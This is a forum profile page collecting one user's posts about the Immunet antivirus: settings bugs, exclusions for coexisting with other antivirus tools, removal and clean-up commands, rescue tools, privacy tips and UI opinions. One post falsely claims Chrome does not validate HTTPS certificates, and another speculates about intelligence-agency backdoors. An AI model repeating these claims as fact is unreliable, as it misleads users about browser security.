Jump to content


  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by zombunny2

  1. This is to confirm I have the same problem too. Latest version of Immunet has no option to "ask me" on detection. For me, this is a complete show-stopper for any AV/antimalware solution. I guess I'll just have to uninstall immunet until the feature is restored in a future version.
  2. I used Immunet alongside Sophos Home for maybe a year on a Windows 10 rig. It was probably the most stable and quick combination I've ever used - and that was with the ClamAV engine enabled as well! They never clashed once, even on files they could both detect. For ages I never bothered adding each to the other's exclusion list, and they played fine together. I eventually added each one's "program files" folders to the other's exclusion-list, when Sophos eventually got a false positive on one of Immunet's temporary files (I had ClamAV enabled). I think I also had to add another Sophos folder (somewhere inside "c:\programdata") to Immunet's exclusions. The combo was great and never gave me an issue once. Speed was similar to running just Windows Defender. The only way I could get quicker performance was to turn off ClamAV or switch to running just Kaspersky or F-Secure on its own.
  3. If you really need to force remove it, you could try removing it with Revo Uninstaller (gratis software) or BCUninstaller (free software, name is short for "Bulk Cr*p Uninstaller"). You will probably have the best chance of it working, by attempting this from safe mode, or at least attempting to stop Immunet's services first. Command to stop Immunet's services: wmic service where "name like 'Immunet%'" call stopservice Procedure for entering safe mode on Windows 10: Start menu --> hold down shift and click power --> restart. From the advanced menu that appears, navigate to the troubleshooting etc. options, and buried-away in there somewhere, is the extremely well-hidden option to reboot in Safe Mode. <annoyed-rant> (I don't know what Microsoft were smoking when they came up with that one, or indeed any of the configuration dialogues in Windows 10. This task used to be accomplished by holding down F5/F8 as soon as you turned on your computer, back when Windows was simple and easy to use. The main use of safe mode is to fix a broken installation that won't boot; you now have to actually be able to boot in order to restart in safe mode)! </annoyed-rant> Good luck!
  4. Hiya, just to confirm the forum has just loaded correctly without warning in the latest versions of Vivaldi and Icecat.
  5. Just a little note/reminder to Immunet users: In the "Exclusions" section of Immunet's options, there are some pre-defined exclusions for a handful of common AV programs, so that you can install Immunet alongside them and it all works "out of the box" - but these still need doublechecking. Unfortunately, programs occasionally change, and I can appreciate it's almost-impossible to keep all of these exclusions perfectly up-to-date. Additionally, it would be impossible to add an exclusion for every single AV that Immunet can run alongside (e.g. there are no exclusions for Sophos, but the two can run very well together). I'd therefore suggest that everyone doublechecks the exclusions for their "main" AV product. As another example, Immunet's exclusion for Kaspersky refers to a very old version. The correct exclusion should now be "%programdata%\Kaspersky Lab\AVP20.0\Data\". On one friend's install with Kaspersky as the main AV, I was getting reports of repeated crashes until I correctly excluded each AV in the other's settings. To be on the safe side, I excluded "%programdata%\Kaspersky Lab\" and "%programfiles(x86)%\Kaspersky Lab\" Don't forget to use the true path the environment variables point to for your system (e.g. %programfiles(x86)% on an English system defaults to "C:\Program Files (x86)").
  6. Has anyone else been getting a certificate error/warning when attempting to visit these forums? I've checked my computer's clock and tried visiting with GNU Icecat (Firefox ESR), regular Firefox, and Vivaldi (based on Chromium). Warning message every time. I haven't tried regular Google Chrome but suspect users of that browser won't have any issue connecting, because last time I paid any attention to anything G, Chrome still wasn't checking the validity of HTTPS certificates (this might seem convenient because all websites "just work", but in reality is a very bad thing for your security). This situation might have changed, but as I have not used anything G for a very long time, I cannot check. If it helps webmasters with any diagnostics, I use "HTTPS everywhere" from EFF.
  7. zombunny2

    UI Concepts

    I like your 1st and 4th designs, because they are not too flat. There's a bit of 3D in them. What I really like about all of these designs is the changes really aren't too radical, and in all of these mockups, the program is instantly recognisable as Immunet. I don't mind designs 2 and 3, but personally I think they're a little too flat and so-called "modern ui" for my taste, and I also worry that the textured background will eventually start to look dated. I'd still welcome any of your designs though!
  8. I wholeheartedly agree. The standard Immunet UI actually looks pretty good and has aged rather well. It's also very easy to understand and use, right from the moment you first ever use the program. The only real area where it starts to show its age is on high resolution screens, where it either appears very small or scales poorly. It was better suited to the days of 800x600 or 1024x768. Maybe all it needs is a very slight cosmetic revamp, and the addition of scaling/HiDPI capability, with the general layout left largely untouched. Like others here, I really don't like the trend for "modern" UI. It's flat, boring, looks dated to begin with, and has no visual appeal whatsoever. It's like the whole metaphor of a "button" that you "press" has gone out of the window, and designers got lazy and just drew harsh-edged rectangles in Paintbrush. I remember DosShell and the MS Windows 1.x-2.x series being more ornate than W10. Even the standard X11 TWM is, and that's older than me! I still think the prettiest and nicest looking user interface for desktop PCs was KDE3 with the Keramik widgets and window-decorations, and Crystal icon theme. That was extremely 3D! The nearest Windows equivalent would probably be Windows XP Luna. Both still look good today even in a VM on modern hardware - although I think the best looking Windows interface by far (and easiest to use) is the 9x/ME/NT/2000 interface. Again, those buttons etc. still look good for some programs, even at high res.
  9. If your machine uses BIOS ("legacy boot"), use something like Emsisoft Emergency Kit, Kaspersky rescue disk, etc. to clean your machine. That should fix any MBR virus. If the BIOS itself has been compromised, you could try reflashing the BIOS from the manufacturer's web site, but really you just can't trust that hardware any more. By the looks of things, it uses EFI though. If the hardware itself (chips) have somehow been compromised, the same applies as above - reflash or junk. However - if just the EFI boot partition has been infected, again EEK or a rescue disk should fix it. You need to have not booted from that hard disk, to be able to fix it. If it still can't be cleaned, just issue an ATA secure erase command (search the net for how to do it), to reset your hard disk to factory settings (or just buy a new hard disk). Then reinstall your OS and restore your files from backups. Be warned: 1. ATA secure-erase wipes absolutely everything from your hard drive. It will all be gone forever (including whatever virus is lurking on it). Don't do it without verifying you have already safely saved everything you needed elsewhere. Once your porn collection and cat-videos are gone, they're gone. 2. If your backups are also compromised, then restoring them will re-infect your machine and you'll be back where you started, just several hours older. This obviously also applies to cloud storage, not just USB sticks and hard drives. 3. If it's not offline and not disconnected, it's not a backup. "The cloud" isn't a backup. Even if it's called "cloud backup". An extra hard-disk partition isn't a backup. Two tapes or hard-disks in a safe, used in rotation, is a backup.
  10. Hope you got it sorted. +1 for Emsisoft Emergency Kit. I wouldn't be without it. It's my go-to cleanup tool and normally one pass with that leaves nothing left for any other tools to clean up. I believe you can also make a bootable CD/DVD/USB clean-up tool from within any Kaspersky product (including home free). They might even provide an ISO on their web site, I don't remember. Once the machine boots up, F-Secure online scanner is also pretty good and very fast. Finally, honourable mention to MalwareBytes - both MBAM and AdwCleaner. These days, I find their detection rate is no where near what it used to be, but it's still worth giving it a go. --- If you're still having trouble, Zemana is very fast but I've never ever seen it detect anything - even when I once tested it on a malware collection I've accumulated. I scanned the entire folder and... precisely zero detections. That said, it probably looks for the indicators of compromise on the actual system, rather than the droppers in a folder. Another issue with it, is that after uninstall, it leaves lots of traces on your system that are extremely difficult to remove - dlls to unregister, files to take ownership of, and the like. If you're getting really desperate, and are familiar with *nix, get any Linux live CD and install clamav into the live session. Then, take your pick of the unofficial databases. I'd suggest any of the low-risk Sane-Security databases, and all the SecuriteInfo databases, and copy those into /var/lib/clamav. Then scan your system with that. Be warned, there will be a few false-positives... If you don't already know how to do this and what to do with clamav's output, I'd say it'd be easier to just wipe your machine and start over by this point, but it's worth a shot if you've used Clamav from within GNU/Linux before, and you've exhausted every other option.
  11. I think I made a suggestion recently on these forums to provide an option for this in some future version of Immunet. The best solution, would be to copy what MalwareBytes do: They have an option in the settings, "Register with Windows Security Center". That way, someone using it as their only protection can set "yes", and someone wanting to use it as a companion to Windows Defender can set "no". When MBAM is not registered with the Security Center, Windows Defender stays on. At the moment, Immunet does not provide this option, so unless you start delving into registry and other settings, it will always turn Windows Defender off.
  12. I don't know if this will help much, but Sophos Home (free version) plays really nicely with Immunet, and I never saw this behaviour in that scenario. Therefore it could be either MBAM or one of the additional components present in Sophos Advanced Endpoint Protection that causes this. I'd guess it'll be one of the behaviour-monitoring or anti-ransomware components. When I ran Sophos Home Free with Immunet, they worked fine straight out of the box, and didn't even fight to clean detections (like the eicar file) - however, to be on the safe side, I excluded each program's "program files" and "program data" (if I could locate it), later on anyway. It may be the case that you need to exclude Sophos's folders in Immunet, and Immunet's folders in Sophos. If Sophos has an option to exclude processes, you could even exclude Immunet's services and GUI from Sophos. Obviously, repeat for MBAM and Immunet too.
  13. Just a quick note: Once or twice (but very rarely) I've had Immunet quarantine a file, and upon attempting to restore it, Immunet has simply responded with "Restore failed" - and the file is seemingly gone forever. I think sometimes Immunet's history database gets corrupted. I've not worked out whether this is some sort of failed quarantine, or whether the history files get a bit corrupted at some point afterwards, preventing restoration. Like I say it's very rare. I think it's only ever happened to me twice, and that's all the time since the pre-ClamAV cloud-only version (pre version 2.0), so it'd be difficult to replicate. I think correct behaviour when "ask me" is selected in the GUI should be to block access to the file (to keep the system safe) and immediately open a dialogue box ("quarantine the file?", yes/no). The file should only be moved to quarantine after the user has clicked "yes". The current method is automatic quarantine, which necessitates restoration of false-positives, which leads to data-loss when an error occurs.
  14. Responding a bit more to your post... I haven't mentioned mobile phone surveillance, but basically if it really worries you, take a look at the Replicant, /e/, and LineageOS ROMs for your phone, and consider ditching the Google Play store and its proprietary apps for the F-Droid store and its free (libre) open-source apps. Or use a non-smart phone. I occasionally have a digital detox with a vintage Nokia. I really don't miss-out on anything. You might also want to consider whether all those loyalty cards (and the data-profiling they entail) are really worth it (unless you're on the poverty line, they're probably not). You might also want to educate yourself (if you haven't already) on when (and when NOT) to use a VPN and/or TOR. You can get some great information by checking out EFF's surveillance self-defense site, privacytools.io, restoreprivacy.com, thatoneprivacysite.net and any other reputable sites dealing with this subject (clue: they won't be sponsored by any of the services they recommend, and they'll be transparent about how they operate). You may also find it useful to change your e-mail and search providers away from the main big ones. Be warned that looking into privacy is like falling down a rabbit-hole, and it's really easy to get very, very paranoid and overestimate your threat model. You can easily cut yourself off from the world, make your computer unusable and bogged-down, etc. I prefer a middle ground, therefore I go for an option of passive resistance: I want advertisers, data-trackers and governments to know that I object to what they do, even though it would be impractical for me to attempt to stop them. I can't stop them, but I can make it a little more difficult and expensive for them, and I can reduce what they get hold of. I don't have much to hide and am not doing anything illegal, but privacy is a basic human right, and I reserve that right even when I don't need to make use of it. By upholding that right, I potentially save the life of someone who does need to make use of that right, such as a whistleblower, human-rights lawyer or journalist. To paraphrase Edward Snowden: "The nothing to hide, nothing to fear argument is like saying nobody should have freedom of speech just because you have nothing to say".
  15. Interesting mention of Sophos. The same concern crossed my mind once, when deciding which AV to use, however I don't think you need to worry! I initially thought Sophos would send data back to GCHQ, however I really doubt it for one big reason: There's absolutely no need to waste the time and effort doing it. The UK already has an intelligence deal with the Americans, which means that there's no need to pressure Sophos to put a backdoor in their software: The NSA probably already has one in the Operating System, which makes compromising the AV a redundant effort. Any data collected by one 5-eyes country is available to the others. For the same reason, I have no problem trusting Immunet (an American AV, owned by Cisco), because it's already running on an American OS (Windows). If the NSA wants to spy on us, they won't ask Sophos, Immunet and others to backdoor their products, when the operating system itself with all its telemetry is already a tool of mass surveillance. All they have to do is issue a court order telling Microsoft to turn over the information they already collect! Alternatively, they could just ask Microsoft to put a backdoor in the operating system. One point of contact and collection for everyone is far more efficient than going via every single AV vendor and relying on your target using one of the AVs you managed to compromise. As a side note, depending on your views about China and Russia you'd still have this theoretical worry with a Chinese or Russian AV, because obviously they're not in the Western spy-club (5/9/14-eyes). They'd therefore have to compromise something like an AV because they wouldn't be able to pressure Microsoft to backdoor the OS or turn over data like that. Of course, depending on your nationality, views and threat-model, you might not be concerned about this - or you might even trust the Chinese and Russians more than the 5/9/14-eye nations of the West. This is of course all speculation. In any given situation, we don't know for sure who is targeted for surveillance, who is doing the surveillance, and which firms and service-providers are implicated in it. My point is that GCHQ has no need to compromise Sophos (or any other AV) because it would be a far better use of resources for the NSA to compromise Microsoft. If you can't trust your operating system, worrying about the software running on it is irrelevant and pointless. This is actually one of the many reasons why I tend to favour GNU/Linux, *BSD /et al/ wherever possible. I admit they're not perfect and not invulnerable, but that's all a discussion for another thread and another day.
  16. Exploits using public charging points have been around for a while. I have always avoided these even since before the first proof-of-concept exploits were published, for two reasons: Firstly, because it was inevitable this would happen, and secondly, because you cannot guarantee the stability and reliability of the power supply at an unknown charging point. If I use the charger that came with my device, plugged into a surge protector, I know it won't damage my device. I would recommend anyone that ever uses these charging points to purchase a USB data-blocker (also often called a "USB condom"), or to use a charging-only cable. A data-blocker is very small (only about the size of your USB plug). It plugs into the USB charging point, and you plug your cable into the data-blocker. It does the same thing as a charging-only cable: It leaves the voltage connections intact but severs the data connections on the plug - so your device can still charge, but it is completely impossible to exchange data via USB. They all seem fairly inexpensive. Mine is a "Portapow" one, which seems to be the most common; however many other manufacturers make them including Mic-Lock (their AC-USB pays homage to AC/DC's logo) and Privise.
  17. I'm sure most Chinese firms and ordinary Chinese people in general are upstanding and honourable, however reading this article did remind me of measures I took about a year ago. I was getting ever-increasing volumes of spam to my e-mail inbox, and I got fed-up with sifting through it, so I configured the e-mail server to automatically reject absolutely anything coming from a Chinese domain-name or IP-address. In short, I geo-blocked the entire state of China. I haven't had a single item of unsolicited SPAM since. I've not yet missed any item of mail I was expecting, either. It might be worth pointing out the obvious, though... which is that if you have Chinese friends or relatives, this would cut them off!
  18. I don't see this option in MS Windows Defender, but maybe it was an option in MS Security Essentials on older versions of Windows. The easiest way to achieve this with minimal effort would be for Immunet to change its process priority (or whatever the Windows equivalent of 'niceness' is), and let Windows handle it. I note that this is what Antivir (now Avira) does (or used to do). It just had a simple dropdown box for "scan priority", with options "idle/low/medium/high". I just tried to see if I could do this manually via the task manager, but it doesn't seem possible, so Immunet would need to have this option added to its GUI. All I can do is change the process priority of the GUI, not the service itself...
  19. Hi all, apologies for resurrecting an older thread, but I simply haven't had the chance to reply. In the interests of courtesy and helping others with similar issues in the future, I thought I'd reply. I had already tried uninstalling (and thought I'd clicked "no" to the "remember stuff?" dialog) - however I did it again, just to be sure. I then ran the Windows built-in disk cleaner, Revo Uninstaller's "search for junk files", Bleachbit, and CCleaner, to ensure I'd removed all temporary files, orphaned registry entries, etc. I also manually searched for any immunet traces by using "dir /s/a/b/p *immunet*" from the command line, from the root directory of drive C. You can use a similar technique to search for anything cisco, sourcefire or clamav related, but in my case it didn't reveal anything Immunet-related, and risks identifying other software. It's then just a case of using "del" and "rd" as appropriate to remove any traces of Immunet (there were virtually none). (There might be a GUI-based way of doing this, but MS generally try to hide directory-structures and system files in their GUI dialogs, so it probably won't work. It was very easy in WfW/Win9x/NT/2000, but I think something changed from XP onwards. If you want to just get something done, cmd is your friend)! Finally, a reboot and clean reinstall of Immunet and it was working fine again. I'm not sure which of these actions cleared the relevant temporary files or database-files that were causing the problem, but this sequence of steps fixed it.
  20. I have just noticed another thing: The settings are forgotten if you run a scan. Steps to reproduce: 1. Change and apply settings. 2. Run a flash scan. 3. Return to settings dialog. Expected behaviour: my settings persist Actual behaviour: my settings forgotton; settings returned to default. Just to confirm everything is online (I can scan etc) and no error messages are appearing.
  21. I've tried a fresh install of Immunet twice now, with the same behaviour. The version I currently have installed is Machine is Windows 10 Pro x64. If I open the settings dialog, change the settings from default (for instance, ask on detection / blocking mode / scan inside archives / scan packed), and hit apply, the settings are not remembered after reboot (or after quitting and restarting the immunet tray icon, or restarting the immunet service). Expected behaviour: My settings persist until I change them Actual behaviour: Default settings return after restarting PC or Immunet tray client or Immunet service. Steps to reproduce: 1. Change and apply settings in the settings dialog. 2. Restart either IPtray, Immunet service(s), or PC. 3. Return to settings dialog and check settings.
  22. Immunet is intended to be a companion AV, much like MalwareBytes is intended to be a companion antimalware. However, there is a slight problem that prevents this happening if you use Windows Defender as your main AV in Windows 10. That problem is Immunet's security-centre integration. In versions of Windows prior to 10, the security centre detected installed antimalware software, but did not automatically disable Microsoft Security Essentials/Defender when present. This caused problems with multiple installed AV programs running simultaneously. A user who installed a 3rd party AV had to manually disable/uninstall Microsoft's AV. As a result, Windows 10 now automatically disables Windows Defender if it detects a third party antimalware solution is installed. For the vast majority of cases, this is desirable to preserve system stability. For companion AV software such as Immunet, this is an annoyance. When you install Immunet, it integrates itself automatically in the Windows 10 security centre. This disables Windows Defender. This is undesirable, as Immunet is a companion AV, and if run alone, it has a lower detection rate, so the net result is a level of protection that is lower than the level provided by Windows Defender! In previous versions of Windows, it was possible to achieve great protection by running Windows Defender in parallel with Immunet. In Windows 10, one would need to install another 3rd party antivirus solution in order to run Immunet as a companion AV. In this case, Windows security centre warns the user that they should not be running two antivirus solutions in parallel! The way MalwareBytes solves this problem is to have an option for "security centre integration" in their settings dialog. That way, if the user wants to use MalwareBytes as the sole protection on the computer, they can enable the option. If they want to run it as a companion program, they can disable the option. So my suggestion is to add "security centre integration" to the list of toggle switches in Immunet's settings dialog.
  23. @Deathinition as I scrolled down this thread I knew you were using either Chromium or a Chromium-based browser. Are you, by any chance, also using either UBlock Origin or Nano Adblocker in it? I repeatedly get this detection from my Immunet install. The filename of the detection is always "f_" followed by a hexadecimal number, and it is always in my Vivaldi (another chromium-based browser) cache folder. In my case, it is a false-positive on one of the blocklists used by UBlock origin. Some of ClamAV and Immunet's signatures trigger on certain malicious web links in text files. UBlock's blocklists are text files filled with, amongst other things, fragments of malicious links (after all, UBlock needs to know what to block). Immunet, unfortunately can't distinguish between "my evil malware site dot com" as a place to go, contained within an evil script, and "my evil malware site dot com" as a place *not* to go, contained within a blocklist! It just sees the link and has to take the cautious approach. I get this same detection if I do a manual scan of my /home directory with ClamAV on GNU/Linux (the OS where I spend >99% of my time). In Vivaldi, there's also a built-in feature that blocks certain really aggressive malvertising features. Most browsers also use the Google safe-browsing database as well. Both of these features of course contain lists of web sites for the browser to avoid - and as a result, both of these features have also triggered this detection in my copy of Immunet before now. But most of the time (almost every time I get this detection), it's UBlock origin updating its filter lists. I can even repeatedly trigger the exact same detection by manuallly forcing UBo to update its blocklists.
  24. I had a quick look at task manager on my Windows PC a bit earlier. Immunet was using about 40-80MB - but it gradually rose to about 350MB while I was observing it. The PC was seemingly idle. However I looked at the "Windows update" dialogue, and it was performing an update in the background, so I think the memory spike was due to Immunet's realtime guard scanning lots of files. The above was measured with blocking mode on and all scanning engines enabled. I suspect that if you disable ClamAV and rely solely on the cloud engines (Ethos and Spero), your memory and CPU usage will decrease significantly - probably down to the tens of megabytes range. I rely on the ClamAV engine as I have an extensive set of custom signatures, so I leave it enabled. If you are always online, then the cloud engines alone will probably provide you adequate protection.
  25. I remember in earlier versions of Immunet, possibly circa 2.0 or 3.0, there was a bug that caused excessive hard disk usage. If I remember right, I think it was related to Immunet's internal logging (scan-result cache). If something caused the realtime guard to scan lots of files, or if the user initiated a system scan, Immunet would thrash the hard disk mercilessly and bring the whole computer to a crawl. Of course, people with SSDs didn't really notice (unless their SSD wore out). Perhaps some sort of regression has been introduced in version 7.0 that affects certain systems? I can confirm it's not happening on a Windows 10 pro machine with a Core i7 8700k. Is Immunet the sole AV, or a companion-AV? Perhaps the workstation's main AV and Immunet are both fighting for access to something, or scanning each other's temporary files, and detecting each other's file-accesses (causing some sort of scanning loop)? This is the only situation where I've noticed this happen in recent years.
  • Create New...